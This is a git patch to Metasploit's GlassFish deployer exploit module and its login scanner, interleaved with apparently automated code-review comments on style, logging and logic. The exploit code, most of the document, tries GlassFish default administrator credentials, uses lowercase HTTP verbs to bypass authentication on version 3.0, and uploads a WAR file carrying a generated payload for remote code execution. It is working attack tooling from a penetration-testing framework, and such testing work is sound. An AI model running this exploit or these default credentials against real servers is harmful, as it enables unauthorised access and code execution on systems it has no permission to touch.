From 8e4fa80728fce5748d2814dccc95df4112f96d43 Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Wed, 24 Jun 2015 19:30:02 -0500
Subject: [PATCH] This looks good so far
---
 .../framework/login_scanner/glassfish.rb | 2 +-
 .../exploits/multi/http/glassfish_deployer.rb | 69 +++++++++++--------
 2 files changed, 41 insertions(+), 30 deletions(-)
diff --git a/lib/metasploit/framework/login_scanner/glassfish.rb b/lib/metasploit/framework/login_scanner/glassfish.rb
index 8537f8b04b..e3aa4124da 100644
--- a/lib/metasploit/framework/login_scanner/glassfish.rb
+++ b/lib/metasploit/framework/login_scanner/glassfish.rb
@@ -14,7 +14,7 @@ module Metasploit
 # @!attribute [r] version
 # @return [String] Glassfish version
- attr_reader :version
+ attr_accessor :version
 # @!attribute jsession
 # @return [String] Cookie session
diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb
index 7fd2600524..5855a3ab9a 100644
--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def auto_target(session, res, version)
 print_status("Attempting to automatically select a target...")
- res = query_serverinfo(session,version)
+ res = query_serverinfo(session, version)
 return nil unless res
 return nil unless res.body
@@ -601,7 +601,7 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Error: #{rhost} did not respond on #{app_rport}.")
 end
- #Sleep for a bit before cleanup
+ # Sleep for a bit before cleanup
 select(nil, nil, nil, 5)
 #Start undeploying
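Review bot: The YARD tag directly above the changed line still reads `# @!attribute [r] version`, but the attribute is now `attr_accessor`, so the generated documentation will keep describing it as read-only. Change the tag to `# @!attribute version`, matching the `jsession` tag documented just below it. The writer is exercised in this same patch by `@scanner.version = version` in glassfish_deployer.rb's `try_normal_login`, so the tag should reflect that callers set it.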
@@ -619,10 +619,8 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Undeployment complete.")
 end
- def init_loginscanner(creds)
- @cred_collection = Metasploit::Framework::CredentialCollection.new(
- userpass_file: creds * "\n"
- )
+ def init_loginscanner
+ @cred_collection = Metasploit::Framework::CredentialCollection.new
 @scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
 configure_http_login_scanner(
@@ -654,30 +652,44 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def my_target_host
- path = normalize_uri(datastore['PATH'])
- my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
+ my_target_host = "http://#{rhost.to_s}:#{rport.to_s}#{normalize_uri(datastore['PATH'])}"
 end
 def try_normal_login(version)
+ init_loginscanner
+
 case version
 when /2\.x|9\.x/
- creds = ['admin adminadmin']
+ @cred_collection.prepend_cred(
+ Metasploit::Framework::Credential.new(
+ public: 'admin',
+ private: 'adminadmin',
+ private_type: :password
+ ))
 when /^3\./
- creds = ['admin']
- else
- creds = []
+ @cred_collection.prepend_cred(
+ Metasploit::Framework::Credential.new(
+ public: 'admin',
+ private: '',
+ private_type: :password
+ ))
 end
- creds << "#{datastore['USERNAME']} #{datastore['PASSWORD']}"
-
- init_loginscanner(creds)
+ @cred_collection.prepend_cred(
+ Metasploit::Framework::Credential.new(
+ public: datastore['USERNAME'],
+ private: datastore['PASSWORD'],
+ private_type: :password
+ ))
+ @scanner.send_request({'uri'=>'/'})
 @scanner.version = version
 @cred_collection.each do |raw|
 cred = raw.to_credential
+ print_status("Trying to login as #{cred.public}:#{cred.private}")
 result = @scanner.attempt_login(cred)
- if result == Metasploit::Model::Login::Status::SUCCESSFUL
- return @scanner.:jsession
+ if result.status == Metasploit::Model::Login::Status::SUCCESSFUL
+ return @scanner.jsession
 end
 end
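Review bot: The added `print_status("Trying to login as #{cred.public}:#{cred.private}")` in `try_normal_login` echoes every password tried, including the operator-supplied `PASSWORD`, to the console and to whatever log captures module output; prefer `vprint_status("Trying to login as #{cred.public}")` so the secret is not written out on every attempt. In `my_target_host`, the new line assigns to a local named after the method and then relies on the implicit return; the assignment adds nothing and the body can simply be `"http://#{rhost}:#{rport}#{normalize_uri(datastore['PATH'])}"`. The `@scanner.send_request({'uri'=>'/'})` issued before the login loop has no comment saying why a bare request must precede the attempts (presumably to obtain a session cookie); a one-line comment there would save the next reader a trip into the scanner. Since `init_loginscanner` now rebuilds `@cred_collection` and `@scanner` at the top of every call, the prepended credentials never accumulate across calls, which is worth stating in a comment if that is the intent.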
@@ -692,15 +704,11 @@ class Metasploit3 < Msf::Exploit::Remote
 return sid if sid
 end
- try_normal_login(version, user, pass, 'non-default')
+ try_normal_login(version)
 end
- def make_war
- my_target = auto_target(sid, res, version) if target.name =~ /Automatic/
- fail_with(Failure::NoTarget, "Unable to automatically select a target") unless mytarget
-
- # Generate payload
- p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
+ def make_war(selected_target)
+ p = exploit_regenerate_payload(selected_target.platform, selected_target.arch)
 jsp_name = rand_text_alphanumeric(4+rand(32-4))
 app_base = rand_text_alphanumeric(4+rand(32-4))
@@ -708,8 +716,8 @@ class Metasploit3 < Msf::Exploit::Remote
 war = p.encoded_war({
 :app_name => app_base,
 :jsp_name => jsp_name,
- :arch => mytarget.arch,
- :platform => mytarget.platform
+ :arch => selected_target.arch,
+ :platform => selected_target.platform
 }).to_s
 return app_base, jsp_name, war
@@ -729,8 +737,8 @@ class Metasploit3 < Msf::Exploit::Remote
 # Set HTTP verbs. Lower-case is used to bypass auth on v3.0
 @verbs = {
- 'GET' => (version == '3.0' || version == '2.x' || version || '9.x') ? "get" : 'GET',
- 'POST' => (version == '3.0' || version == '2.x' || version || '9.x') ? 'post' : 'POST',
+ 'GET' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'get' : 'GET',
+ 'POST' => (version == '3.0' || version == '2.x' || version == '9.x') ? 'post' : 'POST',
 }
 sid = attempt_login(version)
@@ -739,7 +747,10 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Failure::NoAccess, "#{my_target_host()} - GlassFish - Failed to authenticate login")
 end
- app_base, jsp_name, war = make_war
+ selected_target = target.name =~ /Automatic/ ? auto_target(sid, res, version) : target
+ fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target
+
+ app_base, jsp_name, war = make_war(selected_target)
 print_status("Uploading payload...")
 res = upload_exec({
 :session => sid,
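Review bot: The new `def make_war(selected_target)` carries no comment describing what it expects of its argument or what it returns, and now that the target selection it used to perform has moved to the caller, a reader of this method alone cannot tell. Suggest `# Builds the WAR for +selected_target+ (needs #platform and #arch); returns [app_base, jsp_name, war].` directly above the `def`. The method containing the `return sid if sid` / `try_normal_login(version)` lines at the top of this hunk (presumably `attempt_login`, given the call later in the patch) starts outside the hunk.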
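Review bot: The corrected condition `version == '3.0' || version == '2.x' || version == '9.x'` in the `@verbs` hash is now written out twice, once per verb, which is how the `version || '9.x'` slip got duplicated in the first place; hoist it into a local so the two entries cannot drift apart again: `lowercase = %w[3.0 2.x 9.x].include?(version)` followed by `'GET' => lowercase ? 'get' : 'GET',` and `'POST' => lowercase ? 'post' : 'POST',`. This site matches `'3.0'` exactly, whereas `try_normal_login` in the same commit matches the version with `/^3\./`; if `version` can take values such as `'3.1'`, the two sites disagree, and a comment saying which behaviour is intended would help either way.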
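Review bot: The new `auto_target(sid, res, version)` call in `exploit` passes `res`, but `auto_target` overwrites `res` with `query_serverinfo(session, version)` on its first line (hunk @@ -86 of this patch), so the argument is never read; if no `res = ...` assignment precedes this line in `exploit` (the method starts outside this hunk), Ruby will also treat `res` as a method call rather than a local. Either pass `nil` explicitly with a comment, `auto_target(sid, nil, version) # auto_target fetches its own server info`, or drop the parameter from `auto_target` in a follow-up. The `fail_with(Failure::NoTarget, "Unable to automatically select a target") unless selected_target` guard also runs on the manual-target branch, where `target` is never nil; harmless, but the message only describes the automatic case.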